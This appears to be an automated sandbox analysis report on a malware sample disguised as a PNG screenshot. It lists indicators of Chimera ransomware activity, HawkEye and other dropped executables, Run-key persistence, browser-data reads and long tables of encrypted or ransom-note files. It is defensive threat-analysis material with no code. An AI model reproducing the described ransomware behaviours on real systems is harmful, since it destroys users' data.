Resubmissions
08-09-2023 19:19
230908-x1zdesfa2w 10 08-09-2023 19:08
230908-xtd4xaeh7t 6 08-09-2023 19:07
230908-xs5kgaeg85 3 08-09-2023 18:58
230908-xmy6haeg56 7 08-09-2023 17:30
230908-v3hscaea96 8

Analysis
max time kernel: 912s
max time network: 844s
platform: windows10-2004_x64
resource: win10v2004-20230831-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230831-en, locale:en-us, os:windows10-2004-x64, system
submitted: 08-09-2023 19:19
Static task: static1
Behavioral task: behavioral1
Sample: Captura de pantalla 2023-03-05 184332.png
Resource: win10v2004-20230831-en
General
Target: Captura de pantalla 2023-03-05 184332.png
Size: 47KB
MD5: c662c6bef8d03268babc40558500c421
SHA1: 33881cac944362c415ce1c000d0e6c43e7b8fd57
SHA256: 1be92987b9ab334d25c940577da37ccbbd417b2e4e52b97b668347d90e1eeabb
SHA512: 4f7f75247e717337309d73004a79a0986911fa0525f36f41dc5be3ca3a0ed2033575737ceded69895a77626cb6e90152bdb0ea16655e6a8048731301e11802be
SSDEEP: 768:UZ+vjsWKoGWORUYGnBAPmxVU68vKbLxY0OKZY+S7SaLeP2MeqrsP4/jx4Lbf2:UnRofGoLJ8ib75a+kSaLK2Z+sA/eO
Malware Config
Signatures
Chimera 64 IoCs
Ransomware which infects local and network files, often distributed via Dropbox links.
description | ioc | Process
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files\Microsoft Office\root\Templates\Presentation Designs\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
Chimera Ransomware Loader DLL 1 IoCs
Drops/unpacks executable file which resembles Chimera's Loader.dll.
resource | yara_rule
behavioral1/memory/4744-2323-0x0000000010000000-0x0000000010010000-memory.dmp | chimera_loader_dll
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3204 | 648 | cmd.exe | 166
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 2160 | 648 | WerFault.exe | 166
Renames multiple (4029) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource | yara_rule
behavioral1/files/0x000600000002349d-1981.dat | office_macro_on_action

resource
behavioral1/files/0x00060000000234e3-1798.dat
behavioral1/files/0x0007000000023506-1978.dat
behavioral1/files/0x000600000002349d-1981.dat
Executes dropped EXE 7 IoCs
pid | Process
4036 | butterflyondesktop.exe
4592 | butterflyondesktop.tmp
4188 | ButterflyOnDesktop.exe
4744 | HawkEye.exe
4084 | rickroll.exe
2944 | rickroll.exe
4384 | YouAreAnIdiot.exe
Loads dropped DLL 4 IoCs
pid | Process
3892 | taskmgr.exe
684 | taskmgr.exe
4384 | YouAreAnIdiot.exe
4384 | YouAreAnIdiot.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1859779917-101786662-3680946609-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ButterflyOnDesktop | butterflyondesktop.tmp
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops desktop.ini file(s) 27 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Links\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Videos\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\Videos\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Desktop\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\Desktop\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Contacts\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Pictures\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Documents\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\Libraries\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\Music\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Favorites\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\Downloads\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Searches\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\Pictures\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Music\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Users\Public\Documents\desktop.ini | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\desktop.ini | ButterflyOnDesktop.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
293 | bot.whatismyipaddress.com
Drops file in Program Files directory 64 IoCs
description | ioc | Process
File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageStoreLogo.scale-200_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-24.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNotePageMedTile.scale-400.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-outline.xml | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageWideTile.scale-100_contrast-white.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MedTile.scale-200_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalAppList.targetsize-20_altform-unplated_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-200.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-72.png | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Adobe\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-100.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-40_altform-unplated_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\FetchingMail.scale-125.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch.scale-400.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\is-IS\View3d\3DViewerProductDescription-universal.xml | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\export.svg | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_SplashScreen.scale-100.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-24.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-16.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-400.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsBadgeLogo.scale-100.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-32_altform-unplated_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireWideTile.scale-200.jpg | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_18.svg | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-125_contrast-black.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\186.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_PigNose.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-100_contrast-white.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-20_altform-fullcolor.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-unplated.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\ui-strings.js | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\ui-strings.js | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\ICU\icudt26l.dat | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\WideTile.scale-125.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-40.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-60_altform-unplated.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-72_contrast-white.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\WideTile.scale-125.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\StoreLogo.scale-125.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-100_contrast-white.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-100_contrast-white.png | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar | ButterflyOnDesktop.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg | ButterflyOnDesktop.exe
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\YOUR_FILES_ARE_ENCRYPTED.HTML | ButterflyOnDesktop.exe
